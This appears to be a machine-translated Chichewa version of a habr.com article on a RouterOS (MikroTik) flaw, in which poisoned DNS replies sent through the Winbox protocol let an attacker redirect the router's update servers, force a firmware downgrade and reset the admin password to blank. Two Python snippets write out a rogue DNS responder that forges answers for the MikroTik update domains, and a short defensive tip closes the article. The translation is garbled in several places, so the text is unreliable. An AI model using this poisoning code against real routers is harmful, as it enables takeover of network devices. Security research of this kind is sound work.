Kutha kutsitsa zida zakutali kutengera RouterOS (Mikrotik) kumayika mazana masauzande a zida zama netiweki pachiwopsezo. Chiwopsezocho chimalumikizidwa ndi poyizoni wa poyizoni wa DNS wa Winbox protocol ndikukulolani kuti mutsegule zachikale (ndi kukonzanso mawu achinsinsi) kapena firmware yosinthidwa pa chipangizocho.
Zachiwopsezo
The RouterOS terminal imathandizira kutsimikiza kwa DNS kuyang'ana.
Pempholi limayendetsedwa ndi binary yotchedwa solver. Resolver ndi imodzi mwazinthu zambiri zomwe zimalumikizana ndi protocol ya Winbox ya RouterOS. Pamlingo wapamwamba, "mauthenga" otumizidwa ku doko la Winbox amatha kutumizidwa kumabinari osiyanasiyana mu RouterOS kutengera dongosolo la manambala osiyanasiyana.
Mwachikhazikitso, RouterOS ili ndi mawonekedwe a seva ya DNS yoyimitsidwa.
Komabe, ngakhale ntchito ya seva ikayimitsidwa, rauta imasunga cache yake ya DNS.
Tikapanga pempho pogwiritsa ntchito winbox_dns_request mwachitsanzo.com, rauta idzasunga zotsatira zake.
Popeza titha kufotokozera seva ya DNS yomwe pempho liyenera kupita, kulowetsa ma adilesi olakwika sikovuta. Mwachitsanzo, mutha kukhazikitsa seva ya DNS kuchokera
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Tsopano ngati musaka mwachitsanzo.com pogwiritsa ntchito Winbox, mutha kuwona kuti cache ya DNS ya rauta ili ndi poizoni.
Zachidziwikire, poisoning example.com sizothandiza chifukwa rauta sangayigwiritse ntchito. Komabe, rauta iyenera kupeza upgrade.mikrotik.com, cloud.mikrotik.com, cloud2.mikrotik.com ndi download.mikrotik.com. Ndipo chifukwa cha kulakwitsa kwina, ndizotheka kuwapha onse nthawi imodzi.
def dns_response(data):
request = DNSRecord.parse(data)
reply = DNSRecord(DNSHeader(
id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
reply.add_answer(RR(qn,ttl=30,rdata=A("192.168.88.250")))
reply.add_answer(RR("upgrade.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("cloud2.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
reply.add_answer(RR("download.mikrotik.com",ttl=604800,
rdata=A("192.168.88.250")))
print("---- Reply:n", reply)
return reply.pack()
Router imapempha chilolezo chimodzi, ndipo timabwezera asanu. Router sasunga mayankho onse molondola.
Mwachiwonekere, kuukira kumeneku kulinso kothandiza ngati rauta ikugwira ntchito ngati seva ya DNS, chifukwa imalola makasitomala a rauta kuwukiridwa.
Kuwukiraku kumakupatsaninso mwayi wopezerapo mwayi pachiwopsezo chachikulu: kutsitsa kapena kubweza mtundu wa RouterOS. Wowukirayo amakonzanso malingaliro a seva yosinthira, kuphatikiza chosinthira, ndikukakamiza RouterOS kuzindikira mtundu wakale (wosatetezeka) ngati wapano. Choopsa apa chagona pa mfundo yakuti pamene mtunduwo "wasinthidwa", mawu achinsinsi otsogolera amasinthidwa kukhala mtengo wosasintha - wowukira akhoza kulowa mu dongosolo ndi mawu achinsinsi opanda kanthu!
Kuukira kumagwira ntchito, ngakhale zili choncho
Chitetezo
Kungoletsa Winbox kumakupatsani mwayi wodziteteza ku izi. Ngakhale kuli kosavuta kuwongolera kudzera pa Winbox, ndikwabwino kugwiritsa ntchito protocol ya SSH.
Source: www.habr.com